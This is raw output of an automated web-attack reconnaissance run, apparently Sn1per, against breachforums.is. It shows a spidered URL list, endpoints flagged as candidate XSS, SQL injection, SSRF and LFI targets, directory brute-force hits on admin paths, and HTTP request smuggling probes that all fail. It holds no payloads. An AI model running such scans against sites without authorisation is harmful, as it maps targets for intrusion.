https://breachforums.is/cdn-cgi/challenge-platform/h/g/beacon/ov1/1419474528:1692684715:ga3CShYBYhr603c78PIY9BbuwIxc-0M_Kbqlu8dArlk/7fa92652ccd096cb/149675a6182c3d5/non-interactive
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1061884076:1693020131:4dBy-V_mwXdWRbmgCi7-PO_o2GbOU9oyTungt-BVxlY/7fc95a047f3b943a/8e79cf7ffc3676e
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1084049815:1692367717:EsTthl9FVHbqP-S4zM4T0hgObuNBNCNlWjzERG_xe7g/7f8afa110da2f967/4635549b728fec1
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/108881184:1692684582:uJU6Q9oItDsQwZWmD4dYlJ9A0vMefDkZ1SViSecijGI/7fa927bd18cd1566/b35a3ade57ae592
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1089001942:1692497304:huANK75JFrDpNJY6Nr71OXOYWKwWy6mVbw2l0GL3bt0/7f977bcbab32f977/b2bce3e4db0ae8a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1089744838:1692497347:m3O5qMtm0tXBOVUj6wHk31OhH49YkROmv96cE6hNGwY/7f977c2e589e239d/6a740cbf528dd41
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1091412846:1692897834:1mRPiF8Qf9ZEFDaPKjex_WjIni8VnHuvIKG4LpJK5CA/7fbd88948df7172a/027d20feee7a03f
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1117532803:1692684624:5v0Yrw5Et2jm2eRvo9BN_dzTa-5ZzeDoSnJEpmsGvWA/7fa904f079bf15a2/003aa8901072cae
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1117532803:1692684624:5v0Yrw5Et2jm2eRvo9BN_dzTa-5ZzeDoSnJEpmsGvWA/7fa905220ef0ce74/a564d59034250e8
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1117532803:1692684624:5v0Yrw5Et2jm2eRvo9BN_dzTa-5ZzeDoSnJEpmsGvWA/7fa92a191cc4943e/77272fcb174b872
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1127773067:1692684674:QdFy4lF5WCElLVPsOep79APNqgJw-fMQSCvuHjMfUE8/7fa922b9f98615e9/82ea0f5faadd204
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1127773067:1692684674:QdFy4lF5WCElLVPsOep79APNqgJw-fMQSCvuHjMfUE8/7fa9268679d022a2/10be37a05325e53
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1127773067:1692684674:QdFy4lF5WCElLVPsOep79APNqgJw-fMQSCvuHjMfUE8/7fa9284b390315cc/ec52213e2bb95d6
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1134339892:1690326606:R7Jqqrhg-WjKDkNq_e2HWKUbsxcjchzY-edwIoUAAR4/7ec8454e7ce8ced1/a5a13efa058392b
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1165109279:1692897799:aOV7-f3k50UbopjE2sGKcAaWt1M2EscOY4krVatG-30/7fbd882d09939822/edd1445a6069429
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/122820178:1692601764:ExE5DI5Y7t7c1s1uQBGzKXGG3UFbEH0gsQF6K9jP7rM/7fa13e614999238f/aeaefbdeaf2d094
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1238402232:1692608953:OXz-BUBVdnNbGRbMoxTn2eoYhfOdWYtarG6xSyhbWRQ/7fa2009fffcfcf8b/92db30662a47a72
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1257200448:1692489990:o0KduAdC8lV-WAO1ZqNfwWM_qp2a9Q80Chhab9wekWY/7f9691879c761686/c9309f477514360
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1258585583:1693023757:XEo021GePmSirAEHpxJYAfibL4J2-fMcEZtu2AynKLw/7fc960e43a201668/1e14da4f79ab42a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1262589431:1692497276:vuMT0QN69aWWRWEz4Z9c-RWtH_B_SL4u6IoLDD8kY5I/7f977bf13c3c15dd/f909b10706ee312
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1300850246:1692684575:XffWYOQ6l87s3mIZDDFxOFzJbpM40RLRu6fJ26-dSEs/7fa91d302e12ce54/f9d0d71a2a6d3c0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1300850246:1692684575:XffWYOQ6l87s3mIZDDFxOFzJbpM40RLRu6fJ26-dSEs/7fa922579b70f98b/ff67ef849953a78
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1301118843:1692662825:iSHAIzw7MVsSCCdl9aecyA9zxZCJDEPUgjhmbJapedA/7fa71955ea5515bc/bdf670e06b336f0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1336254697:1692688086:GwPxb1rMfPom_InjN8zc2LT7d9Toowz3aR_Ssl70seI/7fa980109cf71732/295620c839d0d46
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1338614576:1692684720:J85tLlpsiraLbb8LWIl6KoE7HC48rJ9SXfQ-dtk-Mqw/7fa91be94c1bf98f/f45ed0585607c23
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1338614576:1692684720:J85tLlpsiraLbb8LWIl6KoE7HC48rJ9SXfQ-dtk-Mqw/7fa9273c8d73fa3a/b3703c349ae3be0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1362193755:1692367784:Bp0koxKpi_lxQjmZsFt58ED1gW-kMlIZEZ7K9Fm0OY0/7f8af9dbfcfed005/e2fd0cf00f89cab
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1363267756:1692684638:dqjkf1DOt9n6MkkJ5FBmO4etsRs-2-K3xIsBtb4mFXE/7fa91c23af1196a5/a357fa5f2383612
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1363267756:1692684638:dqjkf1DOt9n6MkkJ5FBmO4etsRs-2-K3xIsBtb4mFXE/7fa91e4a095ece34/a02ef295e2abb96
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1363267756:1692684638:dqjkf1DOt9n6MkkJ5FBmO4etsRs-2-K3xIsBtb4mFXE/7fa9210b6d96fa8a/40068a7992d9b14
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1363267756:1692684638:dqjkf1DOt9n6MkkJ5FBmO4etsRs-2-K3xIsBtb4mFXE/7fa922cec96bcfb4/d02fb83244f427b
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1378909921:1693020124:ljH6P2t8h8xJIMHTXChL3U_6d9Hb-R41B1cnTAprq80/7fc92801af7e9e50/2e7e15af50b8132
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1378909921:1693020124:ljH6P2t8h8xJIMHTXChL3U_6d9Hb-R41B1cnTAprq80/7fc959d17e4f15fb/50fb530fe88b19a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1381675358:1690308552:ARYRrm448ebBZRLJUYyfBczKB6Xca7JfGqgq8yzrbAk/7ec683fb0fbfcea4/628127a28286c97
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1390418998:1693020046:J-H5jrAUUAOyEoXRJTDhhAT6etAbjgFtQsfFB3y1P28/7fc93a186d4722ae/f80f94682fd9e57
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1395100154:1692497401:FVLGUlLE7bEhsHFRIgFtLM18wClX9WvLqrsmdkiHaLU/7f977bb2ae576441/c1e07d75f80cfc5
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1402532192:1692897779:014h1UDckOKPdHKtzF7LsU17FL3GUIKD36EJOU3iBhg/7fbd86bbfec1f987/00689a38e68582e
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1419474528:1692684715:ga3CShYBYhr603c78PIY9BbuwIxc-0M_Kbqlu8dArlk/7fa9220cd8bff977/6975778e6c26c73
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1419474528:1692684715:ga3CShYBYhr603c78PIY9BbuwIxc-0M_Kbqlu8dArlk/7fa92652ccd096cb/149675a6182c3d5
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1419474528:1692684715:ga3CShYBYhr603c78PIY9BbuwIxc-0M_Kbqlu8dArlk/7fa926a0ccff96e1/57a65cf69d6c352
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1419474528:1692684715:ga3CShYBYhr603c78PIY9BbuwIxc-0M_Kbqlu8dArlk/7fa92a36d88cfaf0/86558893983311c
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1443557146:1692245161:Jxtvnb5vPaeVCHbn8RrY2E9KmZKVaR06-gndG3_JmEA/7f7f36423d1cf9e0/5ab4c947b8fb646
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1471547507:1692245265:wGDNVH7Pl-XQI6aMKjTC4WdLMlwJE9oaZVjHVa5CJm8/7f7f3662d95b172e/475796616543061
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1471547507:1692245265:wGDNVH7Pl-XQI6aMKjTC4WdLMlwJE9oaZVjHVa5CJm8/7f7f36645ce7fa01/e5e9bb74309ebd0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/148799623:1692245331:uwmEaKONCQGisTk9wRT99AgxiFp8-kjhKJluOgjRF6w/7f7f345b9bf615f9/d78bb43073dec0d
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1499520807:1692680788:E8Gw3B6tXXMV6fy2hCJLQJ6d28d2GgMcFLiKqu6JzHo/7fa904103bd42544/ab0187e3dcc84c4
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1499520807:1692680788:E8Gw3B6tXXMV6fy2hCJLQJ6d28d2GgMcFLiKqu6JzHo/7fa90878392515b8/3aecc7a3df9470a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1531514825:1692897840:eUWNf7fW6XVuLlT9aRZxr6hlr_dTUY9_6aMLApSZW-g/7fbd86712ff2ce34/8f76b9491e06dfb
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1541117182:1692490032:jFRh8PwYCQSTcTOIJF-peT2KDWzvkdqo9QyJqfHdsXE/7f9698d22c0af99f/5e3d6d40359ae29
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1562382505:1693020149:4vicr8OXfVtDL_3HO_nr0TIH-XaFaYHK1JlHDJvfk_8/7fc90d0a7b7fcea4/5d1ebb5cd9e3147
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1576630504:1692897737:tIJaC-JPYvQPoxLSGCoZlzpuwGz8sS7_cVygvlrdqKE/7fbd875b6ee9d011/65ca74a6c41291a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1601942260:1692612458:FiEUxzGNzcWt3ZvzRh36SJ5OxEIXbFZNxFrmU7QhxDI/7fa2475afaef9694/7c73cc4ef09980b
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1602533527:1692684561:6ZGT2Z0d6ntDmcsGVhuEs52xc_wba9iThHxLNEqiw6U/7fa904250cb4981c/d522a2299341470
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1626874891:1692684687:nYafBjKOMejBU54OxB_UjHp7lxqAPv4heouo7t-cUlw/7fa92493abeef963/129d2c5b85a234a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/164799325:1693023784:ebVlS7KP8HrnuFbBfhsvFCKSC9z9jwO5yXaGULeqv5c/7fc960bffc579806/b6155b4c1b3d8ef
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/167203070:1692662852:HzlaDP41FGGlZ7RJVp2b9x8b-CGez-EQ3UJsC4f6Ruc/7fa719903d5ece94/c1f43952a367dd8
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1678784099:1692245188:0EQS2B9lFfJ552XVScpUqYgEaWR22y4j2dctAJdEOuI/7f7f362d4bd9fb38/3b3d62201010dde
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1694940522:1692681000:vVaMB_VszblU28nIf5K-7rD-vNnThqaP2x0LYvDBRTY/7fa905018ef3fa62/a01f3e618a3f757
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1717955863:1692680854:e09BvJ5CXFjSAnAI1CNquNqo3NUGqiY6vmT2INcsFDc/7fa9047eff3a967f/14b424da9fea5cc
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1719771961:1690326617:U-j22M-Xwz2ELqY6Z-DJBX9RSANARcUK66mqQs_MyD4/7ec844a8c8309644/2b5c076af236a2f
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1727667165:1692241681:IAr7jRpXQ5z8BQhhgr9BrK3ZyA7p5FsS6jDMRUHGdP8/7f7f1c1a2ca0234f/3a6efd516165acf
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1735053775:1692680919:CQh5UAClTnXy4Qss_MocgJLmWRE1p8XdPjkw6H866UQ/7fa908872ef91736/715e7a1eedf46d1
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1740977491:1692684726:DH7n3f_88iJB2W9OHY8S11OHpgSmJX4e9ivsJpTfQp4/7fa91c6e0906fade/7f612461b707de9
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1742204268:1694795223:mK6esQDe3D6tH-hFQH4Bqyzv010jpOyAdBu_uLge0rU/80729e559d252519/b64e195e0c46ea1
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1764495139:1692684740:FfwInAxWGRVHi7SS4tKHgrExwP1AcR5Cvxkz5Fzbcxc/7fa91d450838cf19/2f0990aec959137
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1783285080:1692367750:fTaMQE-B-0UQxp65tSIF8vCra31ANUbw5QrRcPG_aEA/7f8af9f0b906270c/41717ca87dc406f
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1804297456:1694795261:srtvcjZ_ncGyLg_BqjxRgJt8tqELhsFziRziTo-j8_Q/8072900dad2b15fb/600d9fe572a03cf
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1807491607:1692684610:M_FY23pJkOOsly9qkONQghUo9sjgr-jxARi8ckwYUII/7fa921269b63d01d/e66320eb3328fdb
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1807491607:1692684610:M_FY23pJkOOsly9qkONQghUo9sjgr-jxARi8ckwYUII/7fa924a04bc4cfc0/4bc7ef6783acaaf
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1807491607:1692684610:M_FY23pJkOOsly9qkONQghUo9sjgr-jxARi8ckwYUII/7fa9282b0b9422a2/23fffa04ec5eb68
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1829702485:1692684754:dZDrIB5wFjgakpHte4LQOjQwOf_Era0LAMAjAla_zFo/7fa91e7ec9ba1754/674e35269ca4382
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1829702485:1692684754:dZDrIB5wFjgakpHte4LQOjQwOf_Era0LAMAjAla_zFo/7fa9248bbac8ce6c/1ed38ee27e820c5
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1829702485:1692684754:dZDrIB5wFjgakpHte4LQOjQwOf_Era0LAMAjAla_zFo/7fa92651a81a24c9/f7c6a58eb0c2347
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/184247199:1692284760:zifxnZfDkoUWbL-aFW-cimxBBVAavpKJAEWL2oIifQY/7f82fb8b28672714/c4533394b3d80d0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1870685351:1692489925:zaO7WWgzVHJz1mSBlF_qAMefeJn8ymVZz_JhxpT10KM/7f9698b9b9e6251c/c911f8d45914fdd
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1873172762:1690326715:MJb8YBzN0Z_KAqQIOBcQFqPo-fRnfJGScN5yO26kXHw/7ec844645c1b17ec/287163d9452a349
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1881875246:1692489950:8wox0di1wm-ey66PtcF91fO9LCwCm9J2h0ztfZdTAX8/7f9698f4be022700/dfe4e08d504326e
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1925288593:1692245304:MagemM1DCfAKgoViu_BXdDWvb6dIAjXe1v9taCrAgP0/7f7f36f9da139645/7202422cc9a4b05
====================================================================================•x[2023-09-17](20:13)x•
 FETCHING HACKERTARGET URLS 
====================================================================================•x[2023-09-17](20:13)x•
====================================================================================•x[2023-09-17](20:13)x•
 FETCHING GUA URLS 
====================================================================================•x[2023-09-17](20:13)x•
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN 
====================================================================================•x[2023-09-17](20:14)x•

                                                                                                                    
                _.._                                                                                                
              .'    '.                                                                                              
             /   __   \                                                                                             
          ,  |   ><   |  ,                                                                                          
         . \  \      /  / .                                                                                         
          \_'--`(  )'--'_/                                                                                          
            .--'/()'--.                                                                                             
@xer0dayz  /  /` '' `\  \                                                                                           
             |        |                                                                                             
              \      /                                                                                              
                                                                                                                    
                                                                                                                    
 + -- --=[ https://sn1persecurity.com
 + -- --=[ blackwidow v1.3 by @xer0dayz 


==================================================================================================
http://breachforums.is:80
==================================================================================================                  
__________________________________________________________________________________________________

                                                                                                                    
                _.._                                                                                                
              .'    '.                                                                                              
             /   __   \                                                                                             
          ,  |   ><   |  ,                                                                                          
         . \  \      /  / .                                                                                         
          \_'--`(  )'--'_/                                                                                          
            .--'/()'--.                                                                                             
@xer0dayz  /  /` '' `\  \                                                                                           
             |        |                                                                                             
              \      /                                                                                              
                                                                                                                    
                                                                                                                    
 + -- --=[ https://sn1persecurity.com
 + -- --=[ blackwidow v1.3 by @xer0dayz 

[+] URL's Discovered: 
/usr/share/blackwidow/breachforums.is_80/breachforums.is_80-urls-sorted.txt                                         
__________________________________________________________________________________________________

[+] Dynamic URL's Discovered: 
/usr/share/blackwidow/breachforums.is_80/breachforums.is_80-dynamic-sorted.txt                                      
__________________________________________________________________________________________________

[+] Form URL's Discovered: 
/usr/share/blackwidow/breachforums.is_80/breachforums.is_80-forms-sorted.txt                                        
__________________________________________________________________________________________________

[+] Unique Dynamic Parameters Discovered: 
/usr/share/blackwidow/breachforums.is_80/breachforums.is_80-dynamic-unique.txt                                      
__________________________________________________________________________________________________

[+] Sub-domains Discovered: 
/usr/share/blackwidow/breachforums.is_80/breachforums.is_80-subdomains-sorted.txt                                   
__________________________________________________________________________________________________

[+] Emails Discovered: 
/usr/share/blackwidow/breachforums.is_80/breachforums.is_80-emails-sorted.txt                                       
__________________________________________________________________________________________________

[+] Phones Discovered: 
/usr/share/blackwidow/breachforums.is_80/breachforums.is_80-phones-sorted.txt                                       
__________________________________________________________________________________________________

[+] Loot Saved To: 
/usr/share/blackwidow/breachforums.is_80/                                                                           
__________________________________________________________________________________________________

====================================================================================•x[2023-09-17](20:14)x•
 RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
https://breachforums.is/.well-known/ai-plugin.json
https://breachforums.is/.well-known/assetlinks.json
https://breachforums.is/.well-known/dnt-policy.txt
https://breachforums.is/.well-known/gpc.json
https://breachforums.is/.well-known/security.txt
https://breachforums.is/.well-known/trust.txt
https://breachforums.is/ads.txt
https://breachforums.is/app-ads.txt
https://breachforums.is/canary.txt
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING INTERESTING PARAMETERS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING XSS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
https://breachforums.is/alerts.php?modal=1
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING SSRF STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1690800105
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING REDIRECT STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING RCE STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING IDOR STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING SQL STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING LFI STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING SSTI STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING DEBUG STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:14)x•
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:14)x•
 DOWNLOADING ALL JAVASCRIPT FILES 
====================================================================================•x[2023-09-17](20:14)x•
====================================================================================•x[2023-09-17](20:14)x•
 DISPLAYING ALL JAVASCRIPT COMMENTS 
====================================================================================•x[2023-09-17](20:14)x•
====================================================================================•x[2023-09-17](20:14)x•
 DISPLAYING ALL JAVASCRIPT LINKS 
====================================================================================•x[2023-09-17](20:14)x•
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING LINKFINDER 
====================================================================================•x[2023-09-17](20:14)x•
====================================================================================•x[2023-09-17](20:14)x•
 DISPLAYING PATH RELATIVE LINKS 
====================================================================================•x[2023-09-17](20:14)x•
====================================================================================•x[2023-09-17](20:14)x•
 DISPLAYING JAVASCRIPT URLS 
====================================================================================•x[2023-09-17](20:14)x•
====================================================================================•x[2023-09-17](20:14)x•
 DISPLAYING JAVASCRIPT DOMAINS 
====================================================================================•x[2023-09-17](20:14)x•
====================================================================================•x[2023-09-17](20:14)x•
 RUNNING COMMON FILE/DIRECTORY BRUTE FORCE 
====================================================================================•x[2023-09-17](20:14)x•

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: htm, html, asp, aspx, php, jsp, js | HTTP method: GET | Threads: 100 | Wordlist size: 9696

Output File: /usr/share/sniper/loot/workspace/https:--breachforums.is/web/dirsearch-breachforums.is.txt

Error Log: /usr/share/sniper/plugins/dirsearch/logs/errors-23-09-17_20-14-14.log

Target: http://breachforums.is:80/

[20:14:15] Starting: 
[20:15:19] 401 -   16B  - /admin/dumper/                                     
[20:15:21] 401 -   16B  - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
                                                                              
Task Completed                                                                                                      
====================================================================================•x[2023-09-17](20:18)x•
 RUNNING HTTP REQUEST SMUGGLING DETECTION 
====================================================================================•x[2023-09-17](20:18)x•

  ______                         _              
 / _____)                       | |             
( (____  ____  _   _  ____  ____| | _____  ____ 
 \____ \|    \| | | |/ _  |/ _  | || ___ |/ ___)
 _____) ) | | | |_| ( (_| ( (_| | || ____| |    
(______/|_|_|_|____/ \___ |\___ |\_)_____)_|    
                    (_____(_____|               

     @defparam                         v1.1

[+] URL        : http://breachforums.is:80
[+] Method     : POST
[+] Endpoint   : 
[+] Configfile : default.py
[+] Timeout    : 5.0 seconds
[+] Cookies    : 0 (Appending to the attack)
[nameprefix1]  : OK (TECL: 0.11 - 400) (CLTE: 0.10 - 400)                                           
[tabprefix1]   : OK (TECL: 0.09 - 400) (CLTE: 0.11 - 400)                                           
[tabprefix2]   : OK (TECL: 0.10 - 400) (CLTE: 0.11 - 400)                                           
[space1]       : OK (TECL: 0.11 - 400) (CLTE: 0.10 - 400)                                           
[midspace-01]  : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[postspace-01] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[prespace-01]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspace-01]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[xprespace-01] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacex-01] : OK (TECL: 0.10 - 400) (CLTE: 0.17 - 400)                                           
[rxprespace-01]: OK (TECL: 0.12 - 400) (CLTE: 0.10 - 400)                                           
[xnprespace-01]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacerx-01]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacexn-01]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[midspace-04]  : OK (TECL: 0.09 - 400) (CLTE: 0.11 - 400)                                           
[postspace-04] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[prespace-04]  : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspace-04]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-04] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-04] : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[rxprespace-04]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[xnprespace-04]: OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[endspacerx-04]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-04]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[midspace-08]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[postspace-08] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[prespace-08]  : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[endspace-08]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-08] : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacex-08] : OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
[rxprespace-08]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-08]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[endspacerx-08]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-08]: OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[midspace-09]  : OK (TECL: 0.11 - 400) (CLTE: 0.09 - 400)                                           
[postspace-09] : OK (TECL: 0.13 - 400) (CLTE: 0.10 - 400)                                           
[prespace-09]  : OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspace-09]  : OK (TECL: 0.10 - 400) (CLTE: 0.09 - 400)                                           
[xprespace-09] : OK (TECL: 0.09 - 400) (CLTE: 0.12 - 400)                                           
[endspacex-09] : OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[rxprespace-09]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[xnprespace-09]: OK (TECL: 0.10 - 400) (CLTE: 0.10 - 400)                                           
[endspacerx-09]: OK (TECL: 0.09 - 400) (CLTE: 0.09 - 400)                                           
[endspacexn-09]: OK (TECL: 0.09 - 400) (CLTE: 0.10 - 400)                                           
